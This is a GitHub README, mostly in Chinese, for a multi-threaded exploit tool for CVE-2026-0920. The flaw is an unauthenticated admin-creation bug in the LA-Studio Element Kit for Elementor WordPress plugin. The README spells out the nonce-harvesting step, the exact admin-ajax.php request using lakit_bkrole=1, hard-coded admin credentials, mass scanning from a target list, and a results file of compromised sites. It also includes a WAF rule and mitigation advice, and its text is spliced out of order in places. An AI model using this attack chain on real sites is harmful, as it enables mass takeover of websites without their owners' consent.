Nxploited/CVE-2026-0920-
GitHub: Nxploited/CVE-2026-0920-
针对 CVE-2026-0920 的未认证权限提升漏洞利用工具,演示攻击链并验证 WordPress 管理员接管风险。
Stars: 0 | Forks: 0
# CVE-2026-0920-
LA-Studio Element Kit for Elementor <= 1.5.6.3 - 未认证权限提升:通过后门创建管理用户(lakit_bkrole 参数)
" ← Inline JSON config
ajaxNonce: '' ← JS variable
data-ajaxnonce="" ← HTML attribute
Nonce is publicly accessible — no login required.
↓
ajaxNonce extracted ✔️
──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = lakit_ajax
_nonce =
actions = {
"req1": {
"action": "register",
"data": {
"email": "adminSA12@exploit.com",
"password": "adminSA",
"username": "Nx_admin",
"lakit_field_log": "yes", ← use supplied username
"lakit_field_pwd": "yes", ← use supplied password
"lakit_field_cpwd": "no", ← skip password confirm
"lakit_bkrole": "1", ← trigger admin role injection
"lakit_recaptcha_response": ""
}
}
}
↓
Administrator account silently created ✔️
──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
log = Nx_admin
pwd = adminSA
↓
Session cookies obtained → GET /wp-admin/plugin-install.php
↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
```
## ⚙️ 需求
```
pip install requests colorama
```
| 依赖项 | 用途 |
|--------------|------------------------------------------------|
| `requests` | HTTP 请求、会话处理、Cookie 管理 |
| `colorama` | 所有平台上的彩色终端输出 |
| `threading` | 并发多目标处理 |
| `re` | 从 HTML/JS 中基于正则提取令牌 |
## 📂 文件结构
```
CVE-2026-0920/
├── CVE-2026-0920.py # Main exploit script
├── list.txt # Target URLs — one per line
├── success_results.txt # Auto-generated: pwned targets + credentials
```
## 🚀 使用方法
### 步骤 1 — 配置凭据(可选)
打开 `CVE-2026-0920.py` 并编辑顶部的常量以设置所需的账户详情:
```
ADMIN_EMAIL = "adminSA12@exploit.com" # Email for the new admin account
ADMIN_PASSWORD = "adminSA" # Password for the new admin account
ADMIN_USERNAME = "Nx_admin" # Username for the new admin account
```
### 步骤 2 — 准备目标列表
创建 `list.txt`,每行一个目标 URL:
```
https://target1.com
https://target2.com
http://target3.com
```
### 步骤 3 — 运行漏洞利用
```
python CVE-2026-0920.py
```
系统会提示你:
```
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50): 20
```
### 步骤 4 — 监控实时输出
脚本会生成实时的彩色终端输出:
```
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK
============================================================
[ SUCCESS BLOCK ]
Site : https://target.com
Result : SUCCESS
AJAX OK : YES
FULL ADMIN : YES (login + plugin install access)
============================================================
```
| 颜色 | 含义 |
|-------------|--------------------------------------------------|
| 🔵 青色 `[*]` | 信息 — 当前步骤进行中 |
| 🟢 绿色 `[+]`| 积极信号 — 部分或完全成功 |
| 🟡 黄色 `[!]`| 警告 — 结果模糊,需进一步检查 |
| 🔴 红色 `[-]` | 失败 — 目标不可利用或出错 |
### 步骤 5 — 检查结果
成功的利用结果将写入 `success_results.txt`:
```
https://victim.com | USERNAME:Nx_admin | EMAIL:adminSA12@exploit.com | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3
```
每行包含完整信息:目标、凭据、登录状态、AJAX 响应状态及使用的令牌。
## 🖥️ 脚本参数参考
| 参数 | 默认值 | 描述 |
|-------------------|----------------------------|----------------------------------------------|
| 目标文件 | `list.txt` | 包含目标 URL 的文件 |
| 线程数 | `10`(最大:`50`) | 并发工作线程数 |
| `ADMIN_EMAIL` | `adminSA12@exploit.com` | 注入的管理员账户邮箱 |
| `ADMIN_PASSWORD` | `adminSA` | 注入的管理员账户密码 |
| `ADMIN_USERNAME` | `Nx_admin` | 注入的管理员账户用户名 |
## 🔬 验证逻辑
脚本执行 **两阶段验证** 以消除误报:
```
Stage 1 — AJAX Response Analysis
Checks for success markers in the JSON response:
• "created successfully"
• "success":true
• "type":"success"
• "status":"success"
Stage 2 — Real Login + Plugin Install Access Test
1. POST /wp-login.php with injected credentials
2. GET /wp-admin/plugin-install.php
3. Confirm 200 response + plugin upload form present
4. Confirm no redirect back to wp-login.php
Only BOTH stages passing = TRUE SUCCESS reported
```
这消除了因站点在 AJAX 返回 `200 OK` 但注册静默失败而导致的误报。
## 📊 检测特征
该漏洞利用会产生此特定的网络行为模式——供防御者和 WAF 作者参考:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=lakit_ajax&_nonce=&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}
```
**WAF / IDS 规则(伪代码):**
```
IF request.method == POST
AND request.path == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "lakit_ajax"
AND request.body CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)
```
## 🛡️ 缓解与修复
如果你是**站点所有者、开发人员或防御者**,请立即采取行动:
- ✅ **更新** LA-Studio Element Kit for Elementor 至 **1.5.6.3 以上** 版本
- ✅ **停用并删除** 该插件,直到安装已确认修复的版本
- ✅ **审计** 所有 WordPress 管理员账户 — 立即移除任何未识别的条目
- ✅ **强制执行** 服务端角色验证 — 永远不要信任用户提供的角色值而不进行白名单检查
- ✅ **阻止** 在 WAF 层面未认证 POST 请求到 `admin-ajax.php` 并包含 `lakit_bkrole`
- ✅ **监控** 服务器和 WordPress 活动日志中 `lakit_ajax` AJAX 动作调用
- ✅ **启用** 所有现有管理员账户的双因素认证作为临时防护措施
- ✅ **审查** Wordfence 建议并应用所有加固步骤
## ⚠️ 免责声明
```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.
By downloading, executing, or modifying this script, you explicitly agree:
• You hold EXPLICIT, WRITTEN authorization from the owner of every
target system you test. No exceptions. No grey areas.
• You are operating within a formally scoped, authorized penetration
testing engagement or a controlled lab environment.
• You will NOT use this tool against any system, network, or
infrastructure without documented legal permission.
• Nxploited and all contributors bear ZERO liability for unauthorized
use, data loss, system damage, legal proceedings, or criminal
prosecution arising from the use of this tool.
Unauthorized use of this exploit constitutes a criminal offense under:
— Computer Fraud and Abuse Act (CFAA), USA
— Computer Misuse Act (CMA), UK
— EU Directive 2013/40/EU on Attacks Against Information Systems
— Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
— And all equivalent national and international cybercrime legislation.
USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```
## 👤 作者
```
_____ _____ ___ __ ___ __ __ ___ ___ __
/ __\ \ / / __|_|_ ) \_ )/ / ___ / \/ _ \_ ) \
| (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
\___| \_/ |___| /___\__/___\___/ \__/ /_//___\__/
```
[](https://t.me/KNxploited) [](https://www.cve.org/CVERecord?id=CVE-2026-0920) [](https://nvd.nist.gov/vuln/detail/CVE-2026-0920) [](https://python.org) [](#%EF%B8%8F-disclaimer)
## 🧠 概述
**CVE-2026-0920** 是 **LA-Studio Element Kit for Elementor** WordPress 插件中发现的一个 **CVSS 9.8 严重** 漏洞。
该漏洞存在于 `ajax_register_handle()` 函数中,该函数通过 AJAX 处理未认证用户注册。函数未对 `lakit_bkrole` 参数实施任何限制——允许完全未认证的**攻击者在注册时自行分配 `administrator` 角色**,从而在一次请求中实现**完整的 WordPress 管理员接管**。
| 字段 | 详情 |
|------------------------|------------------------------------------------------|
| **CVE ID** | CVE-2026-0920 |
| **插件** | LA-Studio Element Kit for Elementor |
| **标识符** | `lakit` / `la-studio-element-kit-for-elementor` |
| **受影响版本** | 所有版本直至并包括 **1.5.6.3** |
| **漏洞类型** | 未认证权限提升 / 管理员创建 |
| **攻击向量** | 网络 — 无需认证 |
| **CVSS 3.1 分数** | **9.8 严重** |
| **CVSS 向量** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **影响** | 完整的 WordPress 管理员接管 |
| **研究者** | Nxploited |
## 💀 漏洞深度分析
根本原因是插件 AJAX 注册处理程序中缺少角色权限检查:
```
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);
public function ajax_register_handle() {
$actions = json_decode(stripslashes($_POST['actions']), true);
foreach ($actions as $req) {
if ($req['action'] === 'register') {
$data = $req['data'];
$user_data = [
'user_login' => $data['username'],
'user_pass' => $data['password'],
'user_email' => $data['email'],
'role' => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
];
// No validation of $data['lakit_bkrole'] against allowed roles
wp_insert_user($user_data); // Administrator created silently
}
}
}
```
**为何关键:**
- `wp_ajax_nopriv_*` = **任何未认证用户**均可访问
- `lakit_bkrole` 接受任意 WordPress 角色字符串 — 包括 `administrator`
- 单个 POST 请求即可创建完全权限的管理员账户
- 所需的一次性令牌在站点前端 HTML/JS 中公开暴露
- 默认情况下无速率限制、无 CAPTCHA 强制、无邮件验证要求
## ⚔️ 攻击链
```
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)
Search HTML/JS for:
"ajaxNonce": "[](https://t.me/KNxploited) [](https://www.cve.org/CVERecord?id=CVE-2026-0920) [](https://nvd.nist.gov/vuln/detail/CVE-2026-0920) [](https://python.org) [](#%EF%B8%8F-disclaimer)
| | |
|---------------|-----------------------------------------------------------|
| **Handle** | Nxploited |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
由 Nxploited 精心构建 · 仅限授权安全研究 · CVSS 9.8 严重
标签:AJAX, Backdoor, Critical, CVE-2026-0920, CVSS 9.8, Elementor, lakit_bkrole, Privilege Escalation, Unauthenticated, Web报告查看器, WordPress安全, WordPress插件, 协议分析, 后台用户创建, 威胁模拟, 插件安全, 操作系统监控, 未认证漏洞, 权限提升, 用户注册, 管理员接管, 逆向工具